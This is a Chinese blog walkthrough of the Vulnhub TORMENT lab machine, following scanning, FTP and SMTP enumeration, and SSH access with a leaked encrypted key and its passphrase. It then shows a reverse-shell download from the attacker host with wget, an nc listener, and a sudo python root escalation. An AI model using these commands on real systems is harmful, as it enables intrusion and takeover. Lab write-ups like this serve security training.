0
点赞
收藏
分享

微信扫一扫

靶机渗透练习56-digitalworld.local:TORMENT

进击的铁雾 2022-04-19 阅读 103
web安全

靶机描述

靶机地址:https://www.vulnhub.com/entry/digitalworldlocal-torment,299/

一、搭建靶机环境

攻击机Kali

靶机

注:靶机与Kali的IP地址只需要在同一局域网即可(同一个网段,即两虚拟机处于同一网络模式)

该靶机环境搭建如下

二、实战

2.1网络扫描

2.1.1 启动靶机和Kali后进行扫描

方法一、arp-scan -I eth0 -l (指定网卡扫)

arp-scan -I eth0 -l

⬢  TORMENT  arp-scan -I eth0 -l
Interface: eth0, type: EN10MB, MAC: 00:50:56:27:27:36, IPv4: 192.168.9.7
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.9.2     08:00:27:ab:1a:1b       PCS Systemtechnik GmbH
192.168.9.53    08:00:27:1f:47:d2       PCS Systemtechnik GmbH

2 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.7: 256 hosts scanned in 1.950 seconds (131.28 hosts/sec). 2 responded
方法二、masscan 扫描的网段 -p 扫描端口号

masscan 192.168.184.0/24 -p 80,22

方法三、netdiscover -i 网卡-r 网段

netdiscover -i eth0 -r 192.168.184.0/24

方法四、等你们补充

2.1.2 查看靶机开放的端口

使用nmap -A -sV -T4 -p- 靶机ip查看靶机开放的端口

⬢  TORMENT  nmap -A -sV -T4 -p- 192.168.9.53
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-24 14:30 CST
Nmap scan report for bogon (192.168.9.53)
Host is up (0.00034s latency).
Not shown: 65516 closed tcp ports (reset)
PORT      STATE SERVICE     VERSION
21/tcp    open  ftp         vsftpd 2.0.8 or later
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:192.168.9.7
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 1
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r--    1 ftp      ftp        112640 Dec 28  2018 alternatives.tar.0
| -rw-r--r--    1 ftp      ftp          4984 Dec 23  2018 alternatives.tar.1.gz
| -rw-r--r--    1 ftp      ftp         95760 Dec 28  2018 apt.extended_states.0
| -rw-r--r--    1 ftp      ftp         10513 Dec 27  2018 apt.extended_states.1.gz
| -rw-r--r--    1 ftp      ftp         10437 Dec 26  2018 apt.extended_states.2.gz
| -rw-r--r--    1 ftp      ftp           559 Dec 23  2018 dpkg.diversions.0
| -rw-r--r--    1 ftp      ftp           229 Dec 23  2018 dpkg.diversions.1.gz
| -rw-r--r--    1 ftp      ftp           229 Dec 23  2018 dpkg.diversions.2.gz
| -rw-r--r--    1 ftp      ftp           229 Dec 23  2018 dpkg.diversions.3.gz
| -rw-r--r--    1 ftp      ftp           229 Dec 23  2018 dpkg.diversions.4.gz
| -rw-r--r--    1 ftp      ftp           229 Dec 23  2018 dpkg.diversions.5.gz
| -rw-r--r--    1 ftp      ftp           229 Dec 23  2018 dpkg.diversions.6.gz
| -rw-r--r--    1 ftp      ftp           505 Dec 28  2018 dpkg.statoverride.0
| -rw-r--r--    1 ftp      ftp           295 Dec 28  2018 dpkg.statoverride.1.gz
| -rw-r--r--    1 ftp      ftp           295 Dec 28  2018 dpkg.statoverride.2.gz
| -rw-r--r--    1 ftp      ftp           295 Dec 28  2018 dpkg.statoverride.3.gz
| -rw-r--r--    1 ftp      ftp           295 Dec 28  2018 dpkg.statoverride.4.gz
| -rw-r--r--    1 ftp      ftp           281 Dec 27  2018 dpkg.statoverride.5.gz
| -rw-r--r--    1 ftp      ftp           208 Dec 23  2018 dpkg.statoverride.6.gz
| -rw-r--r--    1 ftp      ftp       1719127 Jan 01  2019 dpkg.status.0
|_Only 20 shown. Use --script-args ftp-anon.maxlist=-1 to see all.
22/tcp    open  ssh         OpenSSH 7.4p1 Debian 10+deb9u4 (protocol 2.0)
| ssh-hostkey: 
|   2048 84:c7:31:7a:21:7d:10:d3:a9:9c:73:c2:c2:2d:d6:77 (RSA)
|   256 a5:12:e7:7f:f0:17:ce:f1:6a:a5:bc:1f:69:ac:14:04 (ECDSA)
|_  256 66:c7:d0:be:8d:9d:9f:bf:78:67:d2:bc:cc:7d:33:b9 (ED25519)
25/tcp    open  smtp        Postfix smtpd
|_smtp-commands: TORMENT.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=TORMENT
| Subject Alternative Name: DNS:TORMENT
| Not valid before: 2018-12-23T14:28:47
|_Not valid after:  2028-12-20T14:28:47
80/tcp    open  http        Apache httpd 2.4.25
|_http-server-header: Apache/2.4.25
|_http-title: Apache2 Debian Default Page: It works
111/tcp   open  rpcbind     2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  3,4         2049/tcp   nfs
|   100003  3,4         2049/tcp6  nfs
|   100003  3,4         2049/udp   nfs
|   100003  3,4         2049/udp6  nfs
|   100005  1,2,3      41233/tcp6  mountd
|   100005  1,2,3      46203/tcp   mountd
|   100005  1,2,3      49339/udp   mountd
|   100005  1,2,3      49394/udp6  mountd
|   100021  1,3,4      34459/tcp6  nlockmgr
|   100021  1,3,4      36137/tcp   nlockmgr
|   100021  1,3,4      53291/udp   nlockmgr
|   100021  1,3,4      58511/udp6  nlockmgr
|   100227  3           2049/tcp   nfs_acl
|   100227  3           2049/tcp6  nfs_acl
|   100227  3           2049/udp   nfs_acl
|_  100227  3           2049/udp6  nfs_acl
139/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp   open  imap        Dovecot imapd
|_imap-capabilities: IMAP4rev1 have LITERAL+ ENABLE more ID post-login AUTH=PLAIN listed capabilities OK Pre-login IDLE AUTH=LOGINA0001 SASL-IR LOGIN-REFERRALS
445/tcp   open  netbios-ssn Samba smbd 4.5.12-Debian (workgroup: WORKGROUP)
631/tcp   open  ipp         CUPS 2.2
|_http-title: Bad Request - CUPS v2.2.1
|_http-server-header: CUPS/2.2 IPP/2.1
2049/tcp  open  nfs_acl     3 (RPC #100227)
6667/tcp  open  irc         ngircd
6668/tcp  open  irc         ngircd
6669/tcp  open  irc         ngircd
6672/tcp  open  irc         ngircd
6674/tcp  open  irc         ngircd
36137/tcp open  nlockmgr    1-4 (RPC #100021)
41735/tcp open  mountd      1-3 (RPC #100005)
46203/tcp open  mountd      1-3 (RPC #100005)
49167/tcp open  mountd      1-3 (RPC #100005)
MAC Address: 08:00:27:1F:47:D2 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Hosts:  TORMENT.localdomain, TORMENT, irc.example.net; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 5h19m57s, deviation: 4h37m07s, median: 7h59m57s
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.5.12-Debian)
|   Computer name: torment
|   NetBIOS computer name: TORMENT\x00
|   Domain name: \x00
|   FQDN: torment
|_  System time: 2022-03-24T22:30:41+08:00
|_nbstat: NetBIOS name: TORMENT, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-time: 
|   date: 2022-03-24T14:30:42
|_  start_date: N/A

TRACEROUTE
HOP RTT     ADDRESS
1   0.34 ms bogon (192.168.9.53)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 40.82 seconds
⬢  TORMENT  

21—ftp—vsftpd 2.0.8 or later—Anonymous FTP login allowed (FTP code 230)

22—ssh—OpenSSH 7.4p1 Debian 10+deb9u4 (protocol 2.0)

25—smtp—Postfix smtpd

80—http—Apache httpd 2.4.25

111—rpcbind—2-4 (RPC #100000)

139—netbios-ssn—Samba smbd 3.X - 4.X (workgroup: WORKGROUP)

143—imap—Dovecot imapd

445—netbios-ssn—Samba smbd 4.5.12-Debian (workgroup: WORKGROUP)

631—ipp—CUPS 2.2

2049—nfs_acl—3 (RPC #100227)
6667—irc—ngircd
6668—irc—ngircd
6669—irc—ngircd
6672—irc—ngircd
6674—irc—ngircd
36137—nlockmgr—1-4 (RPC #100021)
41735—mountd—1-3 (RPC #100005)
46203—mountd—1-3 (RPC #100005)
49167—mountd—1-3 (RPC #100005)

2.2枚举漏洞

2.2.1 21端口分析

anonymous 无密码匿名登录

⬢  TORMENT  ftp 192.168.9.53                                          
Connected to 192.168.9.53.
220 vsftpd (broken)
Name (192.168.9.53:hirak0): anonymous    
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> 

进行信息收集

ftp> ls -al
229 Entering Extended Passive Mode (|||44686|)
150 Here comes the directory listing.
drwxr-xr-x   11 ftp      ftp          4096 Mar 24 22:27 .
drwxr-xr-x   11 ftp      ftp          4096 Mar 24 22:27 ..
drwxr-xr-x    2 ftp      ftp          4096 Dec 31  2018 .cups
drwxr-xr-x    2 ftp      ftp          4096 Dec 31  2018 .ftp
drwxr-xr-x    2 ftp      ftp          4096 Dec 31  2018 .imap
drwxr-xr-x    2 ftp      ftp          4096 Dec 31  2018 .mysql
drwxr-xr-x    2 ftp      ftp          4096 Dec 31  2018 .nfs
drwxr-xr-x    2 ftp      ftp          4096 Jan 04  2019 .ngircd
drwxr-xr-x    2 ftp      ftp          4096 Dec 31  2018 .samba
drwxr-xr-x    2 ftp      ftp          4096 Dec 31  2018 .smtp
drwxr-xr-x    2 ftp      ftp          4096 Jan 04  2019 .ssh
-rw-r--r--    1 ftp      ftp        112640 Dec 28  2018 alternatives.tar.0
-rw-r--r--    1 ftp      ftp          4984 Dec 23  2018 alternatives.tar.1.gz
-rw-r--r--    1 ftp      ftp         95760 Dec 28  2018 apt.extended_states.0
-rw-r--r--    1 ftp      ftp         10513 Dec 27  2018 apt.extended_states.1.gz
-rw-r--r--    1 ftp      ftp         10437 Dec 26  2018 apt.extended_states.2.gz
-rw-r--r--    1 ftp      ftp           559 Dec 23  2018 dpkg.diversions.0
-rw-r--r--    1 ftp      ftp           229 Dec 23  2018 dpkg.diversions.1.gz
-rw-r--r--    1 ftp      ftp           229 Dec 23  2018 dpkg.diversions.2.gz
-rw-r--r--    1 ftp      ftp           229 Dec 23  2018 dpkg.diversions.3.gz
-rw-r--r--    1 ftp      ftp           229 Dec 23  2018 dpkg.diversions.4.gz
-rw-r--r--    1 ftp      ftp           229 Dec 23  2018 dpkg.diversions.5.gz
-rw-r--r--    1 ftp      ftp           229 Dec 23  2018 dpkg.diversions.6.gz
-rw-r--r--    1 ftp      ftp           505 Dec 28  2018 dpkg.statoverride.0
-rw-r--r--    1 ftp      ftp           295 Dec 28  2018 dpkg.statoverride.1.gz
-rw-r--r--    1 ftp      ftp           295 Dec 28  2018 dpkg.statoverride.2.gz
-rw-r--r--    1 ftp      ftp           295 Dec 28  2018 dpkg.statoverride.3.gz
-rw-r--r--    1 ftp      ftp           295 Dec 28  2018 dpkg.statoverride.4.gz
-rw-r--r--    1 ftp      ftp           281 Dec 27  2018 dpkg.statoverride.5.gz
-rw-r--r--    1 ftp      ftp           208 Dec 23  2018 dpkg.statoverride.6.gz
-rw-r--r--    1 ftp      ftp       1719127 Jan 01  2019 dpkg.status.0
-rw-r--r--    1 ftp      ftp        493252 Jan 01  2019 dpkg.status.1.gz
-rw-r--r--    1 ftp      ftp        493252 Jan 01  2019 dpkg.status.2.gz
-rw-r--r--    1 ftp      ftp        492279 Dec 28  2018 dpkg.status.3.gz
-rw-r--r--    1 ftp      ftp        492279 Dec 28  2018 dpkg.status.4.gz
-rw-r--r--    1 ftp      ftp        489389 Dec 28  2018 dpkg.status.5.gz
-rw-r--r--    1 ftp      ftp        470278 Dec 27  2018 dpkg.status.6.gz
-rw-------    1 ftp      ftp          1010 Dec 31  2018 group.bak
-rw-------    1 ftp      ftp           840 Dec 31  2018 gshadow.bak
-rw-------    1 ftp      ftp          2485 Dec 31  2018 passwd.bak
-rw-------    1 ftp      ftp          1575 Dec 31  2018 shadow.bak
226 Directory send OK.
ftp> 

好多东西,直接下载下来进行信息收集:wget -r ftp://192.168.9.53:21

查看channels其内容

⬢  TORMENT  ls -al
总用量 24
drwxr-xr-x  3 hirak0 kali 4096  324 14:55 .
drwxr-xr-x  6 hirak0 kali 4096  324 14:27 ..
drwxr-xr-x 11 root   root 4096  324 14:55 192.168.9.53
-rw-r--r--  1 root   root   33  15  2019 channels
-rw-r--r--  1 root   root 1766  15  2019 id_rsa
-rw-r--r--  1 root   root 1471  324 14:43 torment.txt
⬢  TORMENT  cd 192.168.9.53 
⬢  192.168.9.53  ls -al
总用量 4896
drwxr-xr-x 11 root   root    4096  324 14:55 .
drwxr-xr-x  3 hirak0 kali    4096  324 14:55 ..
-rw-r--r--  1 root   root  112640 1228  2018 alternatives.tar.0
-rw-r--r--  1 root   root    4984 1223  2018 alternatives.tar.1.gz
-rw-r--r--  1 root   root   95760 1228  2018 apt.extended_states.0
-rw-r--r--  1 root   root   10513 1227  2018 apt.extended_states.1.gz
-rw-r--r--  1 root   root   10437 1226  2018 apt.extended_states.2.gz
drwxr-xr-x  2 root   root    4096  324 14:55 .cups
-rw-r--r--  1 root   root     559 1223  2018 dpkg.diversions.0
-rw-r--r--  1 root   root     229 1223  2018 dpkg.diversions.1.gz
-rw-r--r--  1 root   root     229 1223  2018 dpkg.diversions.2.gz
-rw-r--r--  1 root   root     229 1223  2018 dpkg.diversions.3.gz
-rw-r--r--  1 root   root     229 1223  2018 dpkg.diversions.4.gz
-rw-r--r--  1 root   root     229 1223  2018 dpkg.diversions.5.gz
-rw-r--r--  1 root   root     229 1223  2018 dpkg.diversions.6.gz
-rw-r--r--  1 root   root     505 1228  2018 dpkg.statoverride.0
-rw-r--r--  1 root   root     295 1228  2018 dpkg.statoverride.1.gz
-rw-r--r--  1 root   root     295 1228  2018 dpkg.statoverride.2.gz
-rw-r--r--  1 root   root     295 1228  2018 dpkg.statoverride.3.gz
-rw-r--r--  1 root   root     295 1228  2018 dpkg.statoverride.4.gz
-rw-r--r--  1 root   root     281 1227  2018 dpkg.statoverride.5.gz
-rw-r--r--  1 root   root     208 1223  2018 dpkg.statoverride.6.gz
-rw-r--r--  1 root   root 1719127  11  2019 dpkg.status.0
-rw-r--r--  1 root   root  493252  11  2019 dpkg.status.1.gz
-rw-r--r--  1 root   root  493252  11  2019 dpkg.status.2.gz
-rw-r--r--  1 root   root  492279 1228  2018 dpkg.status.3.gz
-rw-r--r--  1 root   root  492279 1228  2018 dpkg.status.4.gz
-rw-r--r--  1 root   root  489389 1228  2018 dpkg.status.5.gz
-rw-r--r--  1 root   root  470278 1227  2018 dpkg.status.6.gz
drwxr-xr-x  2 root   root    4096  324 14:55 .ftp
drwxr-xr-x  2 root   root    4096  324 14:55 .imap
drwxr-xr-x  2 root   root    4096  324 14:55 .mysql
drwxr-xr-x  2 root   root    4096  324 14:55 .nfs
drwxr-xr-x  2 root   root    4096  324 14:55 .ngircd
drwxr-xr-x  2 root   root    4096  324 14:55 .samba
drwxr-xr-x  2 root   root    4096  324 14:55 .smtp
drwxr-xr-x  2 root   root    4096  324 14:55 .ssh
⬢  192.168.9.53  cd .ngircd     
⬢  .ngircd  ls -al
总用量 12
drwxr-xr-x  2 root root 4096  324 14:55 .
drwxr-xr-x 11 root root 4096  324 14:55 ..
-rw-r--r--  1 root root   33  14  2019 channels
⬢  .ngircd  cat channels 
channels:
games
tormentedprinter

找到id_rsa,查看其内容

⬢  .ssh  ls -al
总用量 12
drwxr-xr-x  2 root root 4096  324 14:55 .
drwxr-xr-x 11 root root 4096  324 14:55 ..
-rw-r--r--  1 root root 1766  14  2019 id_rsa
⬢  .ssh  cat id_rsa          
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,C37F0C31D1560056EA1F9204EC405986

U9X/cW7GIiI48TQAzUs5ozEQgexHKiFi2NcoADhs/ax/CTJvZh32k+izzW0mMzl1
mo5HID0qNghIbVbRcN6Zv8cdJ/AhREjy25YZ68zA7GWoyfoch1K/XY0NEnNTchLf
b6k5GEgu5jfQT+pAj1A6jQyzz4A4CGbvD+iEEJRX3qsTlAn6th6dniRORJggnVLB
K4ONTeP4US7GSGTtOD+hwoyoR4zNQKT2Hn/WryoF7LdAXMwf1aNJJJ7YPz1YdSnU
fxXscbOMlXuZ4ouawIVGeYeH85lmOh7aBy5MWsYq/vNC+2pVzVEkRfc6jug1UbdG
hncWxfU92Q47lVuqtc4HPINynD2Q8rBlYrKsEbPqtLyCnBGM/T0Srzztj+IjXUD1
SdbVLmxascquwnIyv2w55vjwJv5dKjLBmrDiY0Doc9YYCGi6cz1p9tsE+G+uRg0r
hGuFXldsYEkoQcJ4iWjsYiqcwWWFfkN+A0rYXqqcDY+aqAy+jXkhyzfmUp3KBz9j
CjR1+7KcmKvNXtjn8V+iv2Nwf+qc2YzBNkBWlwHhxIz6L8F3k3OkqnZUqPKCW2Ga
CNMcIYx3+Gde3aXpHXg4OFALV7y23N8A2h97VOqnnrnED46C39shkA8iiMNdH9mz
87TWgw+wPLbWXJO7G5nJL0qciLV/Eo6atSof3FUx/4WX4fmYeg1Rdy0KgTC1NRGn
VT/YnlBrNW3f7fdhk/YhHbcT9vCg9/Nm3hmzQX/FBP085SgeEA+ebNMzQwPmqcfb
jGpMPdhD7iLmKPwQL3RFTVODjUyzsgJ6kz83aQd80qPClopqp4NFMLwATVpbN858
d4Q0QQGrCRqu2SYaYmVhGo37BJXKE11y0JzWXOhiVLD0I9fBoHDmsKHN4Aw3lbVE
/n+B0Qa1bIMGfXP7J4r7/+4trQCGi7ngVfhtygtg6j/HcoXDy9y15zrHZqKerWd6
6ApM1caan4T0FjqlqTOQsN5GmB9sBCu02VQ1QF3Z4FVA9oW+pkNFxAeKIddG1yLM
5L1ePDgEYjik6vM1lE/65c7fNaO8dndMau4reUnPbTFqKsTA46uUaMyOV6S7nsys
kHGcAXLEzvbC8ojK1Pg5Llok6f8YN+H7cP6vE1yCfx3oU3GdWV36AgBWLON8+Wwc
icoyqfW6E2I0xz5nlHoea/7szCNBI4wZmRI+GRcRgegQvG06QvdXNzjqdezbb4ba
EXRnMddmfjFSihlUhsKxLhCmbaJk5mG2oGLHQcOurvOUPh/qgRBfUf3PTntuUoa0
0+tGGaLYibDNb5eXQ39Bsjzm8BWG/dSK/Qq7UU4Bk2bTKikWQLazPAy482BsZpWI
mXt8ISmJqldgdrtnVvG3zoQBQpspZ6HTojheNazfD4zzvduQguOcKrCNICxoSRgA
egRER+uxaLqNGz+6H+9sl7FYWalMa+VzjrEDU7PeZNgOj9PxLdKbstQLQxC/Zq6+
7kYu2pHwqP2HcXmdJ9xYnptwkuqh5WGR82Zk+JkKwUBEQJmbVxjqWLjCV/CDA06z
6VvrfrPo3xt/CoZkH66qcm9LCTcM3DsLs3UT4B7aH5wk4l5MmpVI4/mx2Dlv0Mkv
-----END RSA PRIVATE KEY-----
⬢  .ssh  

可惜不知道是哪个用户的

2.2.2 22 端口分析

一般只能暴力破解,暂时没有合适的字典

2.2.3 25端口分析

⬢  TORMENT  enum4linux 192.168.9.53 | tee torment.txt
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Thu Mar 24 15:03:13 2022

 ========================== 
|    Target Information    |
 ========================== 
Target ........... 192.168.9.53
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ==================================================== 
|    Enumerating Workgroup/Domain on 192.168.9.53    |
 ==================================================== 
[+] Got domain/workgroup name: WORKGROUP

 ============================================ 
|    Nbtstat Information for 192.168.9.53    |
 ============================================ 
Looking up status of 192.168.9.53
        TORMENT         <00> -         B <ACTIVE>  Workstation Service
        TORMENT         <03> -         B <ACTIVE>  Messenger Service
        TORMENT         <20> -         B <ACTIVE>  File Server Service
        ..__MSBROWSE__. <01> - <GROUP> B <ACTIVE>  Master Browser
        WORKGROUP       <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name
        WORKGROUP       <1d> -         B <ACTIVE>  Master Browser
        WORKGROUP       <1e> - <GROUP> B <ACTIVE>  Browser Service Elections

        MAC Address = 00-00-00-00-00-00

 ===================================== 
|    Session Check on 192.168.9.53    |
 ===================================== 
[E] Server doesn't allow session using username '', password ''.  Aborting remainder of tests.
⬢  TORMENT  

2.2.4 80 端口分析

访问:http://192.168.9.53/

image-20220324150805231

扫描一下目录:gobuster dir -u http://192.168.9.53 -x php,html -r -f -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

⬢  TORMENT  gobuster dir -u http://192.168.9.53 -x php,html -r -f -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.9.53
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              html,php
[+] Add Slash:               true
[+] Follow Redirect:         true
[+] Timeout:                 10s
===============================================================
2022/03/24 15:09:07 Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 10701]
/icons/               (Status: 403) [Size: 284]  
/manual/              (Status: 200) [Size: 626]  
/server-status/       (Status: 403) [Size: 292]  
                                                 
===============================================================
2022/03/24 15:11:00 Finished
===============================================================
⬢  TORMENT  

访问:http://192.168.9.53/manual/

image-20220324151051949

2.2.5 631端口分析

网络服务器没有提供太多信息。 nmap 发现的另一个面向公众的服务是 CUPS(通用 UNIX 打印系统)

631/tcp   open  ipp         CUPS 2.2
|_http-title: Bad Request - CUPS v2.2.1
|_http-server-header: CUPS/2.2 IPP/2.1

访问:http://192.168.9.53:631/

image-20220324151420108

当我的浏览器指向该服务并查看Printers选项卡时,我得到了一个用户名列表。

image-20220324151500359

创建一个usernames文件

⬢  TORMENT  curl -s http://192.168.9.53:631/printers/ | grep Personal | cut -d/ -f3 | cut -d'&' -f1 > usernames
⬢  TORMENT  ls -al
总用量 28
drwxr-xr-x  3 hirak0 kali 4096  3月 24 15:16 .
drwxr-xr-x  6 hirak0 kali 4096  3月 24 14:27 ..
drwxr-xr-x 11 root   root 4096  3月 24 14:55 192.168.9.53
-rw-r--r--  1 root   root   33  1月  5  2019 channels
-rw-r--r--  1 root   root 1766  1月  5  2019 id_rsa
-rw-r--r--  1 root   root 1471  3月 24 15:03 torment.txt
-rw-r--r--  1 root   root  104  3月 24 15:16 usernames
⬢  TORMENT  

咱们使用msf进行枚举smtp用户

⬢  TORMENT  msfconsole -q
msf6 > use auxiliary/scanner/smtp/smtp_enum
msf6 auxiliary(scanner/smtp/smtp_enum) > set rhosts 192.168.9.53
rhosts => 192.168.9.53
msf6 auxiliary(scanner/smtp/smtp_enum) > set user_file /home/kali/vulnhub/digitalworld.local/TORMENT/usernames.txt
user_file => /home/kali/vulnhub/digitalworld.local/TORMENT/usernames.txt
msf6 auxiliary(scanner/smtp/smtp_enum) > exploit

[*] 192.168.9.53:25       - 192.168.9.53:25 Banner: 220 TORMENT.localdomain ESMTP Postfix (Debian/GNU)
[+] 192.168.9.53:25       - 192.168.9.53:25 Users found: Patrick, Qiu
[*] 192.168.9.53:25       - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smtp/smtp_enum) > 

成功拿到Patrick, Qiu

尝试ssh登录一下

⬢  TORMENT  ssh -i id_rsa patrick@192.168.9.53
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@         WARNING: UNPROTECTED PRIVATE KEY FILE!          @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Permissions 0644 for 'id_rsa' are too open.
It is required that your private key files are NOT accessible by others.
This private key will be ignored.
Load key "id_rsa": bad permissions
patrick@192.168.9.53: Permission denied (publickey).
⬢  TORMENT  chmod 600 id_rsa 
⬢  TORMENT  ssh -i id_rsa patrick@192.168.9.53
Enter passphrase for key 'id_rsa': 
patrick@192.168.9.53: Permission denied (publickey).
⬢  TORMENT  ssh -i id_rsa qiu@192.168.9.53    
Enter passphrase for key 'id_rsa': 
qiu@192.168.9.53: Permission denied (publickey).
⬢  TORMENT  


发现需要密码

这个时候想起来,前边ftp里边发现一个.ngircd文件夹

经搜索ngircd是个免费,便携式且轻便的Internet中继聊天服务器

于是我在网上搜索了ngircd配置文件,得到了一个默认密码:wealllikedebian

用户名也在ftp那个文件里有gamestormentedprinter

2.2.6 6667,6668,6669,6672,6674端口分析

我们知道这是通过 Google 进行的 hexchat 聊天。先安装客户端

sudo apt-get install hexchat

打开程序进行相关配置

添加网络--->torment

image-20220324161525994

编辑一下该网络,使用6667,6668,6669,6672,6674端口,密码用wealllikedebian

image-20220324161919629

配置完之后进行连接

image-20220324162104698

image-20220324162138567

成功进入聊天频道,并发现password为:mostmachineshaveasupersecurekeyandalongpassphrase

image-20220324162303460

重新ssh登录一下

⬢  TORMENT  ssh -i id_rsa patrick@192.168.9.53    
Enter passphrase for key 'id_rsa': 
Linux TORMENT 4.9.0-8-amd64 #1 SMP Debian 4.9.130-2 (2018-10-27) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Jan  4 19:34:43 2019 from 192.168.254.139
patrick@TORMENT:~$ 

2.3漏洞利用

。。。

2.4权限提升

2.4.1 信息收集

patrick@TORMENT:~$ id
uid=1001(patrick) gid=1001(patrick) groups=1001(patrick)
patrick@TORMENT:~$ sudo -l
Matching Defaults entries for patrick on TORMENT:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User patrick may run the following commands on TORMENT:
    (ALL) NOPASSWD: /bin/systemctl poweroff, /bin/systemctl halt, /bin/systemctl reboot
patrick@TORMENT:~$ cat /etc/passwd | grep -e '100.*'
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
qiu:x:1000:1000:qiu,,,:/home/qiu:/bin/bash
patrick:x:1001:1001:,,,:/home/patrick:/bin/bash
patrick@TORMENT:~$ find / -iname "*.conf" -type f -perm -o+w -exec ls -ld {} \; 2>/dev/null
-rwxrwxrwx 1 root root 7224 Nov  4  2018 /etc/apache2/apache2.conf
patrick@TORMENT:~$ 

更改一下/etc/apache2/apache2.conf文件内容

image-20220324170309680

上传一个webshell进行反弹shell

patrick@TORMENT:/tmp$ ls -ld /var/www/html
drwxrwxrwx 2 www-data www-data 4096 Mar 25 00:35 /var/www/html
patrick@TORMENT:/tmp$ cd /var/www/html
patrick@TORMENT:/var/www/html$ wget http://192.168.9.7/php-reverse-shell.php
--2022-03-25 00:40:59--  http://192.168.9.7/php-reverse-shell.php
Connecting to 192.168.9.7:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2699 (2.6K) [application/octet-stream]
Saving to: ‘php-reverse-shell.php’

php-reverse-shell.php         100%[=======================================================>]   2.64K  --.-KB/s    in 0s      

2022-03-25 00:40:59 (684 MB/s) - ‘php-reverse-shell.php’ saved [2699/2699]

patrick@TORMENT:/var/www/html$ 

kali进行监听:nc -lvp 6666

访问:http://192.168.9.53/php-reverse-shell.php

⬢  TORMENT  nc -lvp 6666
listening on [any] 6666 ...
Warning: forward host lookup failed for bogon: Host name lookup failure : Resource temporarily unavailable
connect to [192.168.9.7] from bogon [192.168.9.53] 34510
Linux TORMENT 4.9.0-8-amd64 #1 SMP Debian 4.9.130-2 (2018-10-27) x86_64 GNU/Linux
 01:04:19 up 0 min,  0 users,  load average: 2.53, 0.66, 0.22
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=1000(qiu) gid=33(www-data) groups=33(www-data),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),113(bluetooth),114(lpadmin),118(scanner)
sh: 0: can't access tty; job control turned off
$ id
uid=1000(qiu) gid=33(www-data) groups=33(www-data),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),113(bluetooth),114(lpadmin),118(scanner)
$ python -c 'import pty;pty.spawn("/bin/bash")'
qiu@TORMENT:/$ 

然后进行信息收集

qiu@TORMENT:/$ sudo -l
sudo -l
Matching Defaults entries for qiu on TORMENT:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User qiu may run the following commands on TORMENT:
    (ALL) NOPASSWD: /usr/bin/python, /bin/systemctl

发现python可以进行sudo提权

qiu@TORMENT:/$ sudo python -c 'import pty;pty.spawn("/bin/bash")'
